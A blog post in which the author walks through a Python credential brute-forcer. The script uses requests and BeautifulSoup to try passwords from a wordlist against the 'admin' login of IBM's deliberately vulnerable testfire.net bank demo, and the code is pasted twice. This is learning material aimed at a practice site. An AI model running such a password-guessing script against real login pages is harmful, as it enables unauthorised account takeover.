Inspired by the amazing null humla
session that I attended I thought of writing my own simple login-brute-force in
python using requests. There are a lot of brute-forcing scripts in the market
but I thought of writing my own.
I love the Requests library
for python, as the author says "Its HTTP for Humans" it actually is.
I really encourage using this library at least once if one wants to
start learning python web scraping.
I have also used BeautifulSoup library
to extract few HTML tags. The website which I have used is http://www.testfire.net,
which is a vulnerable bank application developed by IBM for web app testing.
The script is used to brute force all
possible passwords against a single user name "admin". I initially
tried writing it with cookiejar but some how the code got little lengthier but then Requests came to my rescue.
The script opens a file called
'password.txt' containing a list of random passwords to brute force. In this
case the correct password is "admin", with Requests library it is possible to intercept the request in a proxy before
hitting the server. Here I am running a proxy on port 8082 just to see the data
what my script is sending.Feel free to use the script
(for learning purpose only), here is the gist link.
#Author: Prajal Kulkarni
import requests
import sys
from bs4 import BeautifulSoup as BS
proxyDict = {"http":"127.0.0.1:8082"}
url = "http://www.testfire.net/bank/login.aspx"
def connect(url,m):
t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict)
print t.text
soup = BS(t.text)
a=soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
x = str(a.string)
print x
if x == "MY ACCOUNT" :
print "The pass is" + " " + m['passw']
sys.exit()
else:
print "Password %s not working" %m['passw']
def controller():
m = {}
f=open('password.txt','r').read().split('\n')
for line in f:
m["uid"] = "admin"
m["passw"] = str(line)
m["btnSubmit"] = "Login"
print m
connect(url,m)
controller()
import sys
from bs4 import BeautifulSoup as BS
proxyDict = {"http":"127.0.0.1:8082"}
url = "http://www.testfire.net/bank/login.aspx"
def connect(url,m):
t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict)
print t.text
soup = BS(t.text)
a=soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
x = str(a.string)
print x
if x == "MY ACCOUNT" :
print "The pass is" + " " + m['passw']
sys.exit()
else:
print "Password %s not working" %m['passw']
def controller():
m = {}
f=open('password.txt','r').read().split('\n')
for line in f:
m["uid"] = "admin"
m["passw"] = str(line)
m["btnSubmit"] = "Login"
print m
connect(url,m)
controller()
No comments :
Post a Comment